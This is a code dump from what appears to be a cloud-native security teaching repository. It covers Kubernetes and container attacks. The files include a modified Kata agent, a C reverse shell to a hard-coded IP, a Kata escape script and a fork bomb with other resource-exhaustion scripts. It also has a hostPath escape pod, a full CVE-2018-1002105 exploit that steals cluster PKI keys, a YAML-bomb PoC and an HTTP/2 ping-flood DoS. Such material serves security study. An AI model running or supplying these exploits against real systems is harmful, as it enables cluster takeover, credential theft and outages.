	if st.Size() != req.FileSize {
		return emptyResp, nil
	}

	if err := os.Chmod(tmpPath, os.FileMode(req.FileMode)); err != nil {
		return emptyResp, err
	}

	if err := os.Chown(tmpPath, int(req.Uid), int(req.Gid)); err != nil {
		return emptyResp, err
	}

	// At this point the temporary file has the expected size; atomically
	// move it over the destination.
	agentLog.WithFields(logrus.Fields{
		"tmp-path": tmpPath,
		"des-path": path,
	}).Debugf("Moving temporary file")

	if err := os.Rename(tmpPath, path); err != nil {
		return emptyResp, err
	}

	return emptyResp, nil
}

func (a *agentGRPC) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) {
	// We could check 'tracing' too and error out if it is already set. But
	// instead, we permit that scenario, making this call a NOP if tracing
	// is already enabled via traceModeFlag.
	if startTracingCalled {
		return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already enabled")
	}

	// The only trace type supported for dynamic tracing is isolated.
	enableTracing(traceModeDynamic, traceTypeIsolated)
	startTracingCalled = true

	var err error

	// Ignore the provided context and recreate the root context.
	// Note that this call will not be traced, but all subsequent ones
	// will be.
	rootSpan, rootContext, err = setupTracing(agentName)
	if err != nil {
		return nil, fmt.Errorf("failed to setup tracing: %v", err)
	}

	a.sandbox.ctx = rootContext
	grpcContext = rootContext

	return emptyResp, nil
}

func (a *agentGRPC) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) {
	// Like StartTracing(), this call permits tracing to be stopped when
	// it was originally started using traceModeFlag.
	if !tracing && !startTracingCalled {
		return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing not enabled")
	}

	if stopTracingCalled {
		return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already disabled")
	}

	// Signal to the interceptors that tracing needs to end.
stopTracingCalled = true return emptyResp, nil } ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/mount.go ================================================ // // Copyright (c) 2017-2019 Intel Corporation // // SPDX-License-Identifier: Apache-2.0 // package main import ( "bufio" "context" "fmt" "os" "path/filepath" "regexp" "strconv" "strings" "syscall" pb "github.com/kata-containers/agent/protocols/grpc" "github.com/pkg/errors" "github.com/sirupsen/logrus" "golang.org/x/sys/unix" "google.golang.org/grpc/codes" grpcStatus "google.golang.org/grpc/status" ) const ( type9pFs = "9p" typeVirtioFS = "virtio_fs" typeRootfs = "rootfs" typeTmpFs = "tmpfs" procMountStats = "/proc/self/mountstats" mountPerm = os.FileMode(0755) ) var flagList = map[string]int{ "acl": unix.MS_POSIXACL, "bind": unix.MS_BIND, "defaults": 0, "dirsync": unix.MS_DIRSYNC, "iversion": unix.MS_I_VERSION, "lazytime": unix.MS_LAZYTIME, "mand": unix.MS_MANDLOCK, "noatime": unix.MS_NOATIME, "nodev": unix.MS_NODEV, "nodiratime": unix.MS_NODIRATIME, "noexec": unix.MS_NOEXEC, "nosuid": unix.MS_NOSUID, "rbind": unix.MS_BIND | unix.MS_REC, "relatime": unix.MS_RELATIME, "remount": unix.MS_REMOUNT, "ro": unix.MS_RDONLY, "silent": unix.MS_SILENT, "strictatime": unix.MS_STRICTATIME, "sync": unix.MS_SYNCHRONOUS, "private": unix.MS_PRIVATE, "shared": unix.MS_SHARED, "slave": unix.MS_SLAVE, "unbindable": unix.MS_UNBINDABLE, "rprivate": unix.MS_PRIVATE | unix.MS_REC, "rshared": unix.MS_SHARED | unix.MS_REC, "rslave": unix.MS_SLAVE | unix.MS_REC, "runbindable": unix.MS_UNBINDABLE | unix.MS_REC, } func createDestinationDir(dest string) error { targetPath, _ := filepath.Split(dest) return os.MkdirAll(targetPath, mountPerm) } // mount mounts a source in to a destination. 
This will do some bookkeeping: // * evaluate all symlinks // * ensure the source exists func mount(source, destination, fsType string, flags int, options string) error { var absSource string // Log before validation. This is useful to debug cases where the gRPC // protocol version being used by the client is out-of-sync with the // agents version. gRPC message members are strictly ordered, so it's // quite possible that if the protocol changes, the client may // try to pass a valid mountpoint, but the gRPC layer may change that // through the member ordering to be a mount *option* for example. agentLog.WithFields(logrus.Fields{ "mount-source": source, "mount-destination": destination, "mount-fstype": fsType, "mount-flags": flags, "mount-options": options, }).Debug() if source == "" { return fmt.Errorf("need mount source") } if destination == "" { return fmt.Errorf("need mount destination") } if fsType == "" { return fmt.Errorf("need mount FS type") } var err error switch fsType { case type9pFs, typeVirtioFS: if err = createDestinationDir(destination); err != nil { return err } absSource = source case typeTmpFs: absSource = source default: absSource, err = filepath.EvalSymlinks(source) if err != nil { return grpcStatus.Errorf(codes.Internal, "Could not resolve symlink for source %v", source) } if err = ensureDestinationExists(absSource, destination, fsType); err != nil { return grpcStatus.Errorf(codes.Internal, "Could not create destination mount point: %v: %v", destination, err) } } if err = syscall.Mount(absSource, destination, fsType, uintptr(flags), options); err != nil { return grpcStatus.Errorf(codes.Internal, "Could not mount %v to %v: %v", absSource, destination, err) } return nil } // ensureDestinationExists will recursively create a given mountpoint. 
If directories // are created, their permissions are initialized to mountPerm func ensureDestinationExists(source, destination string, fsType string) error { fileInfo, err := os.Stat(source) if err != nil { return grpcStatus.Errorf(codes.Internal, "could not stat source location: %v", source) } if err := createDestinationDir(destination); err != nil { return grpcStatus.Errorf(codes.Internal, "could not create parent directory: %v", destination) } if fsType != "bind" || fileInfo.IsDir() { if err := os.Mkdir(destination, mountPerm); !os.IsExist(err) { return err } } else { file, err := os.OpenFile(destination, os.O_CREATE, mountPerm) if err != nil { return err } file.Close() } return nil } func parseMountFlagsAndOptions(optionList []string) (int, string) { var ( flags int options []string ) for _, opt := range optionList { flag, ok := flagList[opt] if ok { flags |= flag continue } options = append(options, opt) } return flags, strings.Join(options, ",") } func parseOptions(optionList []string) map[string]string { options := make(map[string]string) for _, opt := range optionList { idx := strings.Index(opt, "=") if idx < 1 { continue } key, val := opt[:idx], opt[idx+1:] options[key] = val } return options } func removeMounts(mounts []string) error { for _, mount := range mounts { if err := syscall.Unmount(mount, 0); err != nil { return err } } return nil } // storageHandler is the type of callback to be defined to handle every // type of storage driver. type storageHandler func(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) // storageHandlerList lists the supported drivers. 
var storageHandlerList = map[string]storageHandler{ driver9pType: virtio9pStorageHandler, driverVirtioFSType: virtioFSStorageHandler, driverBlkType: virtioBlkStorageHandler, driverBlkCCWType: virtioBlkCCWStorageHandler, driverMmioBlkType: virtioMmioBlkStorageHandler, driverSCSIType: virtioSCSIStorageHandler, driverEphemeralType: ephemeralStorageHandler, driverLocalType: localStorageHandler, } func ephemeralStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { s.Lock() defer s.Unlock() newStorage := s.setSandboxStorage(storage.MountPoint) if newStorage { var err error if err = os.MkdirAll(storage.MountPoint, os.ModePerm); err == nil { _, err = commonStorageHandler(storage) } return "", err } return "", nil } func localStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { s.Lock() defer s.Unlock() newStorage := s.setSandboxStorage(storage.MountPoint) if newStorage { // Extract and parse the mode out of the storage options. // Default to os.ModePerm. opts := parseOptions(storage.Options) mode := os.ModePerm if val, ok := opts["mode"]; ok { m, err := strconv.ParseUint(val, 8, 32) if err != nil { return "", err } mode = os.FileMode(m) } if err := os.MkdirAll(storage.MountPoint, mode); err != nil { return "", err } // We chmod the permissions for the mount point, as we can't rely on os.MkdirAll to set the // desired permissions. return "", os.Chmod(storage.MountPoint, mode) } return "", nil } // virtio9pStorageHandler handles the storage for 9p driver. func virtio9pStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { return commonStorageHandler(storage) } // virtioMmioBlkStorageHandler handles the storage for mmio blk driver. func virtioMmioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { //The source path is VmPath return commonStorageHandler(storage) } // virtioBlkCCWStorageHandler handles the storage for blk ccw driver. 
func virtioBlkCCWStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) { devPath, err := getBlkCCWDevPath(s, storage.Source) if err != nil { return "", err } if devPath == "" { return "", grpcStatus.Errorf(codes.InvalidArgument, "Storage source is empty") } storage.Source = devPath return commonStorageHandler(storage) } // virtioFSStorageHandler handles the storage for virtio-fs. func virtioFSStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { return commonStorageHandler(storage) } // virtioBlkStorageHandler handles the storage for blk driver. func virtioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { // If hot-plugged, get the device node path based on the PCI address else // use the virt path provided in Storage Source if strings.HasPrefix(storage.Source, "/dev") { FileInfo, err := os.Stat(storage.Source) if err != nil { return "", err } // Make sure the virt path is valid if FileInfo.Mode()&os.ModeDevice == 0 { return "", fmt.Errorf("invalid device %s", storage.Source) } } else { devPath, err := getPCIDeviceName(s, storage.Source) if err != nil { return "", err } storage.Source = devPath } return commonStorageHandler(storage) } // virtioSCSIStorageHandler handles the storage for scsi driver. func virtioSCSIStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) { // Retrieve the device path from SCSI address. devPath, err := getSCSIDevPath(s, storage.Source) if err != nil { return "", err } storage.Source = devPath return commonStorageHandler(storage) } func commonStorageHandler(storage pb.Storage) (string, error) { // Mount the storage device. if err := mountStorage(storage); err != nil { return "", err } return storage.MountPoint, nil } // mountStorage performs the mount described by the storage structure. 
func mountStorage(storage pb.Storage) error {
	flags, options := parseMountFlagsAndOptions(storage.Options)
	return mount(storage.Source, storage.MountPoint, storage.Fstype, flags, options)
}

// addStorages takes the list of storages passed by the caller and performs
// the associated operations for each storage, such as waiting for the device
// to show up and mounting it to a specific location, according to the type
// of handler chosen.
func addStorages(ctx context.Context, storages []*pb.Storage, s *sandbox) (mounts []string, err error) {
	span, ctx := trace(ctx, "mount", "addStorages")
	span.setTag("sandbox", s.id)
	defer span.finish()

	var mountList []string
	var storageList []string

	defer func() {
		if err != nil {
			s.Lock()
			for _, path := range storageList {
				if err := s.unsetAndRemoveSandboxStorage(path); err != nil {
					agentLog.WithFields(logrus.Fields{
						"error": err,
						"path":  path,
					}).Error("failed to roll back addStorages")
				}
			}
			s.Unlock()
		}
	}()

	for _, storage := range storages {
		if storage == nil {
			continue
		}

		devHandler, ok := storageHandlerList[storage.Driver]
		if !ok {
			return nil, grpcStatus.Errorf(codes.InvalidArgument, "Unknown storage driver %q", storage.Driver)
		}

		// Wrap the span around the handler call to avoid modifying
		// the handler interface but also to avoid having to add trace
		// code to each driver.
		handlerSpan, _ := trace(ctx, "mount", storage.Driver)
		mountPoint, err := devHandler(ctx, *storage, s)
		handlerSpan.finish()

		if _, ok := s.storages[storage.MountPoint]; ok {
			storageList = append([]string{storage.MountPoint}, storageList...)
		}

		if err != nil {
			return nil, err
		}

		if mountPoint != "" {
			// Prepend the mount point to the mount list.
			mountList = append([]string{mountPoint}, mountList...)
		}
	}

	return mountList, nil
}

// getMountFSType returns the FS type corresponding to the passed mount point
// and any error encountered.
func getMountFSType(mountPoint string) (string, error) {
	if mountPoint == "" {
		return "", errors.Errorf("Invalid mount point '%s'", mountPoint)
	}

	mountstats, err := os.Open(procMountStats)
	if err != nil {
		return "", errors.Wrapf(err, "Failed to open file '%s'", procMountStats)
	}
	defer mountstats.Close()

	// Refer to fs/proc_namespace.c:show_vfsstat() for
	// the file format.
	re := regexp.MustCompile(fmt.Sprintf(`device .+ mounted on %s with fstype (.+)`, mountPoint))

	scanner := bufio.NewScanner(mountstats)
	for scanner.Scan() {
		line := scanner.Text()
		matches := re.FindStringSubmatch(line)
		if len(matches) > 1 {
			return matches[1], nil
		}
	}

	if err := scanner.Err(); err != nil {
		return "", errors.Wrapf(err, "Failed to parse proc mount stats file %s", procMountStats)
	}

	return "", errors.Errorf("Failed to find FS type for mount point '%s'", mountPoint)
}

================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_bin.c
================================================
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
/* NOTE: the original <...> header names were lost during extraction; the
 * headers below are reconstructed from the functions actually used. */
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define REMOTE_ADDR "172.16.56.1"
#define REMOTE_PORT 10000

int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int s;

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
    sa.sin_port = htons(REMOTE_PORT);

    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));

    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);

    execve("/bin/bash", 0, 0);
    return 0;
}

================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/exploit.sh
================================================
#!/bin/bash
set -e

# warm up
echo "[*] Running an Ubuntu container to warm up..."
docker run --rm ubuntu uname -a

echo "[*] Exploiting to escape kata..."
echo "[*] Running malicious container with kata on CLH..."
docker run --rm --name stage1 kata-malware-image:latest
echo "[+] Guest image file has been compromised"

echo "[*] Running malicious container with kata on CLH once again..."
docker run --rm -d --name stage2 kata-malware-image:latest
echo "[+] Done. Now you can wait for the reverse shell :)"

================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/get_kata_src.sh
================================================
#!/bin/bash
mkdir -p $GOPATH/src/github.com/kata-containers/
cd $GOPATH/src/github.com/kata-containers/
git clone https://github.com/kata-containers/agent
cd agent
git checkout 1.10.0

================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/install_kata.sh
================================================
#!/bin/bash
set -e -x

# Download the release tarball (skip this step if already downloaded)
#wget https://github.com/kata-containers/runtime/releases/download/1.10.0/kata-static-1.10.0-x86_64.tar.xz
tar xf kata-static-1.10.0-x86_64.tar.xz
rm -rf /opt/kata
mv ./opt/kata /opt
rmdir ./opt
rm -rf /etc/kata-containers
cp -r /opt/kata/share/defaults/kata-containers /etc/

# Use Cloud Hypervisor as the hypervisor
rm /etc/kata-containers/configuration.toml
ln -s /etc/kata-containers/configuration-clh.toml /etc/kata-containers/configuration.toml

# Configure Docker
mkdir -p /etc/docker/
cat << EOF > /etc/docker/daemon.json
{
  "runtimes": {
    "kata-runtime": {
      "path": "/opt/kata/bin/kata-runtime"
    },
    "kata-clh": {
      "path": "/opt/kata/bin/kata-clh"
    },
    "kata-qemu": {
      "path": "/opt/kata/bin/kata-qemu"
    }
  },
  "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"]
}
EOF

mkdir -p /etc/systemd/system/docker.service.d/
cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime
EOF

# Reload configuration & restart Docker
systemctl daemon-reload && systemctl restart docker
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_cpu.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y stress
stress -c 1000

================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_disk.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y util-linux
fallocate -l 9.4G ./bomb

================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_mem.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y stress
stress --vm-bytes 3300m --vm-keep -m 3

================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_pid.sh
================================================
#!/bin/bash
:() { :|:& };:

================================================
FILE: code/0402-Kubernetes组件不安全配置/deploy_escape_pod_on_remote_host.sh
================================================
#!/bin/bash
cat << EOF > escape.yaml
# attacker.yaml
apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    imagePullPolicy: IfNotPresent
    # Just spin & wait forever
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - name: escape-host
      mountPath: /host-escape-door
  volumes:
  - name: escape-host
    hostPath:
      path: /
EOF
kubectl -s TARGET-IP:8080 apply -f escape.yaml
sleep 8
kubectl -s TARGET-IP:8080 exec -it attacker /bin/bash

================================================
FILE: code/0403-CVE-2018-1002105/attacker.yaml
================================================
# attacker.yaml
apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    imagePullPolicy: IfNotPresent
    # Just spin & wait forever
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - name: escape-host
      mountPath: /host-escape-door
  volumes:
  - name: escape-host
    hostPath:
      path: /

================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_namespace.yaml
================================================
# cve_2018_1002105_namespace.yaml
apiVersion: v1
kind: Namespace
metadata:
  name: test

================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_pod.yaml
================================================
# cve_2018_1002105_pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: test
  namespace: test
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    imagePullPolicy: IfNotPresent
    # Just spin & wait forever
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  serviceAccount: default
  serviceAccountName: default

================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role.yaml
================================================
# cve_2018_1002105_role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: test
  namespace: test
rules:
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - get
  - list
  - delete
  - watch
- apiGroups:
  - ""
  resources:
  - pods/exec
  verbs:
  - create
  - get

================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role_binding.yaml
================================================
# cve_2018_1002105_role_binding.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: test
  namespace: test
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: test
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: test

================================================
FILE: code/0403-CVE-2018-1002105/exploit.py
================================================
"""ExP for CVE-2018-1002105

ONLY USED FOR SECURITY RESEARCH
ILLEGAL USE IS **PROHIBITED**
"""
import base64
from secrets import token_bytes
import sys
import argparse
import socket
import ssl
from urllib import parse
import json
try:
    from http_parser.parser import HttpParser
except ImportError:
    from http_parser.pyparser import HttpParser

context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)

# Args
parser = argparse.ArgumentParser(description='ExP for CVE-2018-1002105.')
required = parser.add_argument_group('required arguments')
required.add_argument('--target', '-t', dest='host', type=str,
                      help='API Server\'s IP', required=True)
required.add_argument('--port', '-p', dest='port', type=str,
                      help='API Server\'s port', required=True)
required.add_argument('--bearer-token', '-b', dest='token', type=str,
                      help='Bearer token for the low privileged user',
                      required=True)
required.add_argument('--namespace', '-n', dest='namespace', type=str,
                      help='Namespace with method access',
                      default='default', required=True)
required.add_argument('--pod', '-P', dest='pod', type=str, required=True,
                      help='Pod with method access')
args = parser.parse_args()

# HTTP Gadgets
http_delimiter = '\r\n'
host_header = f'Host: {args.host}:{args.port}'
auth_header = f'Authorization: Bearer {args.token}'
conn_header = 'Connection: upgrade'
upgrade_header = 'Upgrade: websocket'
agent_header = 'User-Agent: curl/7.64.1'
accept_header = 'Accept: */*'
origin_header = f'Origin: http://{args.host}:{args.port}'
sec_key = base64.b64encode(token_bytes(20)).decode('utf-8')
sec_websocket_key = f'Sec-WebSocket-Key: {sec_key}'
sec_websocket_version = 'Sec-WebSocket-Version: 13'

# secret targets
ca_crt = 'ca.crt'
client_crt = 'apiserver-kubelet-client.crt'
client_key = 'apiserver-kubelet-client.key'


def _get_http_body(byte_http):
    p = HttpParser()
    recved = len(byte_http)
    p.execute(byte_http, recved)
    return p.recv_body().decode('utf-8')


def _recv_all_once(ssock, length=4096):
    res = b""
    incoming = True
    while incoming:
        try:
            res += ssock.recv(length)
        except socket.timeout:
            if not res:
                continue
            else:
                break
    return res


def _try_to_get_privilege(ssock, namespace, pod):
    payload1 = http_delimiter.join(
        (f'GET /api/v1/namespaces/{namespace}/pods/{pod}/exec HTTP/1.1',
         host_header,
         auth_header,
         upgrade_header,
         conn_header))
    payload1 += http_delimiter * 2
    ssock.send(payload1.encode('utf-8'))


def _run_with_privilege(ssock, get_path):
    payload = http_delimiter.join(
        (f'GET {get_path} HTTP/1.1',
         host_header,
         auth_header,
         conn_header,
         upgrade_header,
         origin_header,
         sec_websocket_key,
         sec_websocket_version))
    payload += http_delimiter * 2
    ssock.send(payload.encode('utf-8'))


def _match_or_exit(banner_bytes, resp, fail_message="[-] Failed."):
    if banner_bytes in resp:
        return
    print(fail_message)
    sys.exit(1)


def _get_secret(resp):
    delimiter = b'-----'
    start = resp.index(delimiter)
    end = resp.rindex(delimiter)
    return resp[start:end + len(delimiter)].decode('utf-8')


def _save_file(file_name, content):
    with open(file_name, 'w') as f:
        f.write(content)


def _steal_secret(api_server, secret_file, match_banner):
    with socket.create_connection((args.host, int(args.port))) as sock:
        with context.wrap_socket(sock, server_hostname=args.host) as ssock:
            ssock.settimeout(1)
            print('[*] Creating new privileged pipe...')
            _try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)
            resp = _recv_all_once(ssock)
            _match_or_exit(b'stdin, stdout, stderr', resp)
            print(f"[*] Trying to steal {secret_file}...")
            cmd1 = parse.quote('/bin/cat')
            cmd2 = parse.quote(f"/etc/kubernetes/pki/{secret_file}")
            _run_with_privilege(
                ssock,
                f'/exec/kube-system/{api_server}/kube-apiserver'
                f'?command={cmd1}&command={cmd2}&input=1&output=1&tty=0')
            resp = _recv_all_once(ssock)
            _match_or_exit(b'HTTP/1.1 101 Switching Protocols', resp)
            _match_or_exit(match_banner, resp,
                           fail_message=f'[-] Cannot find banner {match_banner}.')
            print(f'[+] Got {secret_file}.')
            secret_content = _get_secret(resp)
            _save_file(secret_file, secret_content)
            print(f'[+] Secret {secret_file} saved :)')


def main():
    print("[*] Exploiting CVE-2018-1002105...")
    with socket.create_connection((args.host, int(args.port))) as sock:
        with context.wrap_socket(sock, server_hostname=args.host) as ssock:
            # step 1
            ssock.settimeout(1)
            print("[*] Checking vulnerable or not...")
            _try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)
            resp = _recv_all_once(ssock)
            _match_or_exit(
                b'stdin, stdout, stderr',
                resp,
                fail_message='[-] Not vulnerable to CVE-2018-1002105.')
            print("[+] Vulnerable to CVE-2018-1002105, continue.")
            # step 2
            print("[*] Getting running pods list...")
            _run_with_privilege(ssock, '/runningpods/')
            resp = _recv_all_once(ssock)
            _match_or_exit(b'HTTP/1.1 200 OK', resp)
            print("[+] Got running pods list.")
            pods_info = json.loads(_get_http_body(resp))
            pods_list = [pod['metadata']['name'] for pod in pods_info['items']]
            for pod in pods_list:
                if pod.startswith('kube-apiserver'):
                    api_server = pod
                    break
            else:
                print("[-] Cannot find API Server.")
                sys.exit(1)
            print(f"[*] API Server is {api_server}.")
    # step 3
    _steal_secret(
        api_server=api_server,
        secret_file=ca_crt,
        match_banner=b'BEGIN CERTIFICATE')
    _steal_secret(
        api_server=api_server,
        secret_file=client_crt,
        match_banner=b'BEGIN CERTIFICATE')
    _steal_secret(
        api_server=api_server,
        secret_file=client_key,
        match_banner=b'BEGIN RSA PRIVATE KEY')
    print('[+] Enjoy your trip :)')
    cmd_try = f"kubectl --server=https://{args.host}:{args.port}" \
              f" --certificate-authority={ca_crt}" \
              f" --client-certificate={client_crt}" \
              f" --client-key={client_key} get pods -n kube-system"
    print(cmd_try)


if __name__ == "__main__":
    main()

================================================
FILE: code/0403-CVE-2018-1002105/test-token.csv
================================================
password,test,test,test

================================================
FILE: code/0404-K8s拒绝服务攻击/CVE-2019-11253-poc.sh
================================================
#!/bin/bash

# Check the Kubernetes version
kubectl version | grep Server

# Start a proxy to the API Server
kubectl proxy &

# Create a malicious ConfigMap file (n=9)
cat << EOF > cve-2019-11253.yaml
apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default
EOF

# Send the ConfigMap creation request to the API Server
curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @cve-2019-11253.yaml

================================================
FILE: code/0404-K8s拒绝服务攻击/CVE-2019-9512-poc.py
================================================
#!/usr/bin/python
# cve-2019-9512.py
import ssl
import socket
import time
import sys


class PingFlood:
    # HTTP/2 connection preface (magic)
    PREAMBLE = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
    # PING frame
    PING_FRAME = b"\x00\x00\x08" \
                 b"\x06" \
                 b"\x00" \
                 b"\x00\x00\x00\x00" \
                 b"\x00\x01\x02\x03\x04\x05\x06\x07"
    # WINDOW_UPDATE frame
    WINDOW_UPDATE_FRAME = b"\x00\x00\x04\x08\x00\x00\x00\x00\x00\x3f\xff\x00\x01"
    # SETTINGS frame
    SETTINGS_FRAME = b"\x00\x00\x12\x04\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x64\x00" \
                     b"\x04\x40\x00\x00\x00\x00\x02\x00\x00\x00\x00"
    # SETTINGS ACK frame
    SETTINGS_ACK_FRAME = b"\x00\x00\x00\x04\x01\x00\x00\x00\x00"
    # HEADERS frame requesting /healthz
    HEADERS_FRAME_healthz = b"\x00\x00\x29\x01\x05\x00\x00\x00\x01\x82\x04\x86\x62\x72\x8e\x84" \
                            b"\xcf\xef\x87\x41\x8e\x0b\xe2\x5c\x2e\x3c\xb8\x5f\x5c\x4d\x8a\xe3" \
                            b"\x8d\x34\xcf\x7a\x88\x25\xb6\x50\xc3\xab\xb8\xd2\xe1\x53\x03\x2a" \
                            b"\x2f\x2a"

    def __init__(self, ip, port=6443, socket_count=1000):
        # Configure the TLS context towards the Kubernetes API Server
        self._context = ssl.SSLContext(ssl.PROTOCOL_TLS)
        self._context.check_hostname = False
        self._context.load_cert_chain(certfile="./client_cert",
                                      keyfile="./client_key_data")
        self._context.load_verify_locations("./certificate_authority_data")
        self._context.verify_mode = ssl.CERT_REQUIRED
        # self._context.keylog_filename = "/Users/rambo/Desktop/exp/keylog"
        # Protocol negotiation (ALPN)
        self._context.set_alpn_protocols(['h2', 'http/1.1'])
        self._ip = ip
        self._port = port
        # Create n sockets
        self._sockets = [self.create_socket() for _ in range(socket_count)]

    def create_socket(self):
        try:
            print("[*] Creating socket...")
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(4)
            # Apply the configured TLS context
            ssock = self._context.wrap_socket(sock, server_side=False)
            ssock.connect((self._ip, self._port))
            # First issue a normal request to the /healthz endpoint
            ssock.send(self.PREAMBLE)
            ssock.send(self.SETTINGS_FRAME)
            ssock.send(self.HEADERS_FRAME_healthz)
            ssock.send(self.SETTINGS_ACK_FRAME)
            # Receive the responses and replies
            rmsg = ssock.recv(1024)
            rmsg = ssock.recv(1024)
            rmsg = ssock.recv(1024)
            rmsg = ssock.recv(1024)
            rmsg = ssock.recv(4096)
            # Return a socket ready for the attack
            return ssock
        except socket.error as se:
            print("[-] Error: " + str(se))
            # Socket creation failed; wait a moment and retry
            time.sleep(0.5)
            return self.create_socket()

    def attack(self):
        print("[*] Flooding...")
        for s in self._sockets:
            try:
                # Send a PING frame without reading the response frame
                s.send(self.PING_FRAME)
            except socket.error:
                self._sockets.remove(s)
                self._sockets.append(self.create_socket())


if __name__ == "__main__":
    dos = PingFlood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]))
    dos.attack()

================================================
FILE: code/0405-云原生网络攻击/Dockerfile
================================================
FROM ubuntu:latest
COPY k8s_dns_mitm.py /poc.py
RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
RUN apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 python3-pip && apt clean
RUN pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn
RUN chmod u+x /poc.py
ENTRYPOINT ["/bin/bash", "-c", "/poc.py example.com "]

================================================
FILE: code/0405-云原生网络攻击/attacker.yaml
================================================
# attacker_pod
apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
  - name: main
    image: k8s_dns_mitm:1.0
    imagePullPolicy: IfNotPresent
================================================
FILE: code/0405-云原生网络攻击/build_image.sh
================================================
#!/bin/bash
docker build -t k8s_dns_mitm:1.0 .

================================================
FILE: code/0405-云原生网络攻击/cleanup.sh
================================================
#!/bin/bash
set -e -x
kubectl delete pod victim attacker
for record in $(arp | grep cni0 | awk '{print $1}'); do
    arp -d "$record"
done

================================================
FILE: code/0405-云原生网络攻击/exploit.sh
================================================
#!/bin/bash
set -e

echo "[*] Pulling curl image..."
docker pull curlimages/curl:latest

echo "[*] Creating attacker and victim pods..."
kubectl apply -f attacker.yaml
kubectl apply -f victim.yaml

echo "[*] Waiting 20s for pods' creation..."
sleep 20

echo "[*] Reading attacker's log..."
kubectl logs attacker

